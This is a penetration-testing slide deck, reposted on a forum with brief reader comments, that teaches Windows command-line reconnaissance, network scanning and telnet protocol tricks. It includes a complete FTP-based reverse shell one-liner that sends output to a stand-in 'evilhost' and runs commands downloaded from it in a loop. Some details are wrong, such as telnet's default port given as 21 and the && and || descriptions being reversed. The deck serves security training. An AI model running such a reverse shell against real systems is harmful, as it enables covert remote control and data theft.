Hacking Without Tools: Windows

[begood]

Chris Clymer, CISSP

ChrisClymer.com/articles/hacking_windows

Who am I?

• I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA
  
• I'm not even very good at Minesweeper
  
• I'm a UNIX geek
  
• I love the command line
  
• How much you ask?
  
• This entire presentation was created by writing out HTML markup by hand in the Vim text editor
  

Why are you getting Windows tips from a UNIX guy?

• It turns out that for some reason, not every system runs UNIX
  
• In fact, the ones we're most concerned about in Information Security are often running Windows (strange!)
  
• Bearded UNIX guys need to get cozy in the WIN32 world
  
• Windows veterans benefit from learning to better leverage their OS's CLI
  
• This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe"
  

Why hack without your tools?

• You can't always guarantee that you'll have your toolbox available
  
• Relying on your tools can limit you
  
• You want to impress women with your leet CLI skills
  
• The vast majority of the commands I will show you today should work on a typical modern Windows installation
  

Our friend command.exe

• This lab will focus on command.exe
  
• Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms
  
• You can launch it by going to Start -> Run -> cmd
  

Our Building Blocks

• Find \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitive
  
• Ping -n 5 host - sends 5 ICMP ping packets to host
  
• Telnet host port - spawns an interactive telnet session to host. If is specified, this is used instead of the default Telnet port of 21
  

Command Control and Redirection

• command1 & command2 - Run command1 and then command2
  
• command1 && command2 - Run command1 only if command2 runs successfully
  
• command1 || command2 - Execute command1 only when command2 does NOT run successfully
  
• command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist.
  
• command >> "output.txt" - Concatenate output from command onto the end of file "output.txt"
  
• command1 | command2 - Pipe the output of command1 into command2
  
• You can direct the errors from a command using 2> errors.txt
  

System Reconnaissance

• set - show environment variables
  
• net user - show local users
  
• net localgroups - show local groups
  
• sc query - list running services
  
• sc query state= all - list all services
  
• wmic process list full - show details on all running processes
  
• tasklist /svc - show all running processess and associated services
  

Network Reconnaissance

• netstat -nao - show all current network activity, including PID's
  
• netsh firewall show config - display windows firewall configuration
  
• ipconfig /displaydns - systems this host has recently resolved through DNS
  
• arp -a - systems on the same subnet this host has recently communicated with
  
• nslookup - all purpose DNS query tool
  

Let's Try One

• Clear your DNS cache: ipconfig /flushdns
  
• ipconfig /displaydns should only show your localhost:
  

Let's Try One

• Now lets add an entry: ping google.com
  
• Another ipconfig /displaydns should show the new entry for google.com
  

More on Nslookup

• nslookup some host - will lookup that host in DNS based on your localhost's DNS configuration
  
• nslookup - starts nslookup in interactive mode
  
• set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR.
  
• ls -d example.com - if the server allows it, does a zone transfer of example.com
  
• ls -t example.com - will give a list of member servers from the domain
  

Fun with Telnet!

• Telnet is just an outdated, insecure remote administration tool right?
  
• What happens when you telnet to a port other than 21?
  
• Turns out many protocols are simple enough to interact with over telnet
  
• Telnet can stand in for Netcat for 1-way communication with remote hosts
  

Lets test out some HTTP

• You won'y be able to see what you're typing once you've started telnet
  
• First type GET /index.html http/1.1 and hit return
  

Lets test out some HTTP

• You should see something like the response below
  

Lets test out some BAD HTTP

• This time we'll type GET blah
  
• This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages
  

What about SMTP?

• Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25
  
• Now that we're talking to the server we'll start the session by typing EHLO and then hitting enter
  
• type quit when ready to end the session
  
• If you know your SMTP syntax, you can send email this way
  

Telnet isn't the only choice

• Many default Windows CLI apps can interact with a network
  
• Many of these offer shell-like functionality and flexibility
  
• These apps can fill your Netcat niche when uploading nc.exe isn't an option
  

Reverse shell using FTP

echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >>

ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt

& echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L

%i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F

"delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del

commands.txt) & ping -n 4 127.0.0.1)

Explanation of FTP Reverse Shell

• This command will be run on a compromised host
  
• The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"
  
• Next it will upload the content of "output.txt" to evilhost
  
• Finally it will download "commands.txt" from evilhost, and run whatever is inside
  
• All of this is done in an infinite loop
  
• As long as the commands in "commands .txt" direct their output to "output.txt" evilhost will get the results
  

Lets Talk About Loops

• FOR /L - these loops are counters:
  
• FOR /L %i in (1,1,10) echo "Hello World" - prints "Hello World" 10 times
  
• FOR /F - these loops are iterators
  
• FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line
  

Neat Shell Control Tricks

• FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0
  
• ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand-in
  

Network Scanning with Ping

• FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
  
• This command will ping every host from 10.10.10.1 - 10.10.10.255
  
• By using find to parse through the results for "Reply" we only see the hosts which are responding
  
• By using @ping we prevent the ping commands themselves from showing in the terminal
  

Reverse DNS Lookups

• FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
  
• Once again we're iterating through all hosts in the 10.10.10.0/24 network
  
• This time we will first echo each hosts IP to the terminal
  
• Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output!
  
• Searching through the results for "Name" gets us the part we care about
  

Other Useful Commands

• type - show the contents of a file
  
• openfiles /local on - enable openfiles logging(requires reboot)
  
• openfiles /query /v - show details on all open files
  
• reg query [KeyName] - display value of registry key [KeyName]
  
• net use - mount fileshare
  

Resources

• "Pen-Test Ninjitsu: Part 1" - Core Security Technologies
  
• "Built-in Windows Commands to Determine if a System has been Hacked" - Built-in Windows commands to determine if a system has been hacked
  
• "Nslookup and DNS Zone Transfers" - nslookup and DNS Zone Transfers
  
• SANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis SANS: Computer Security Training, Network Security Research, InfoSec Resources
  
• Windows Command Line Second Edition - William Stanek (Microsoft Press)
  
• "Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008
  

SANS 560

• If you found this lab useful, I strongly reccomend taking Ed Skoudis's SANS 560 course
  
• Ed is the best resource I have found for this sort of usage of the Windows CLI
  
• Much of this lab was based on my experience taking the 560 course
  
• Ed's 1-day Windows Scripting course covers this material as well
  
• Plus he's got much better war stories than I do!
  

Hacking From the Windows Command Line

[alexalghisi]

ft tare bv

[Flubber]

bookmarked, exceptional, de mult voiam asa ceva si este foarte foarte folositor!

You can't always guarantee that you'll have your toolbox available

Relying on your tools can limit you

11/10

[Caustee]

WOW. E superb acest tutorial!

[sekuristu]

Pretty nice